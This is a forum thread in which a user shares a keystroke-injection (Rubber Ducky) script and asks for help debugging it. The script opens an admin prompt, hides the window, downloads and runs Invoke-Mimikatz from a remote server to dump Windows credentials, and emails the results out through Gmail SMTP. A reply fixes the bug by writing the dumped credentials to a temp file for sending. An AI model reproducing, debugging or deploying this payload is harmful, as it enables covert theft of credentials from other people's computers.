Eno12345 Posted August 14, 2017 Share Posted August 14, 2017 I am trying to add a twist on the 15 second password stealer i robot hack in which it emails the credentials instead of uploading them to a server. This is my code. I changed the email addresses and passwords for security. DELAY 3000 REM Open an admin command prompt GUI r DELAY 500 STRING powershell Start-Process cmd -Verb runAs ENTER DELAY 2000 ALT y DELAY 1000 REM Obfuscate the command prompt STRING mode con:cols=18 lines=1 ENTER STRING color FE ENTER REM Download and execute Invoke Mimikatz then upload the results STRING powershell "IEX (New-Object Net.WebClient).DownloadString('http://darren.kitchen/im.ps1');$output = Invoke-Mimikatz -DumpCreds; $output > log.txt;" ENTER DELAY 1500 STRING powershell ENTER STRING $SMTPServer = 'smtp.gmail.com' ENTER STRING $SMTPInfo = New-Object Net.Mail.SmtpClient($SmtpServer, 587) ENTER STRING $SMTPInfo.EnableSsl = $true ENTER STRING $SMTPInfo.Credentials = New-Object System.Net.NetworkCredential('MyEmail1@gmail.com', 'MyPassword') ENTER STRING $ReportEmail = New-Object System.Net.Mail.MailMessage ENTER STRING $ReportEmail.From = 'MyEmail1@gmail.com' ENTER STRING $ReportEmail.To.Add('MyEmail2@gmail.com') ENTER STRING $ReportEmail.Subject = 'PassDump' ENTER STRING $ReportEmail.Body = (Get-Content Log.txt | out-string) ENTER STRING $SMTPInfo.Send($ReportEmail) ENTER DELAY 2000 STRING exit ENTER DELAY 500 REM Clear the Run history and exit ENTER STRING exit ENTER and in my email in-box all i got was a email that said the words " Quote Invoke-Mimikatz -DumpCreds How do I get it so it actually sends the output of Invoke-Mmikats instead of literally sending the words Invoke-Mimikatz. Thanks in advance. Quote Link to comment Share on other sites More sharing options...
ThoughtfulDev Posted August 17, 2017 Share Posted August 17, 2017 (edited) Use something like: Invoke-Mimikatz -DumpCreds|Out-File '%tmp%\%computername%_creds.txt'; this writes the output of Invoke-Mimikatz to your temp folder in a file name yourpcname_creds.txt which you can then read and or even send as a email attachment if you want. ps: the invoke mimikatz script isn't hosted on darrens webserver - use your own host. Edited August 17, 2017 by ThoughtfulDev Fixed Typo Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.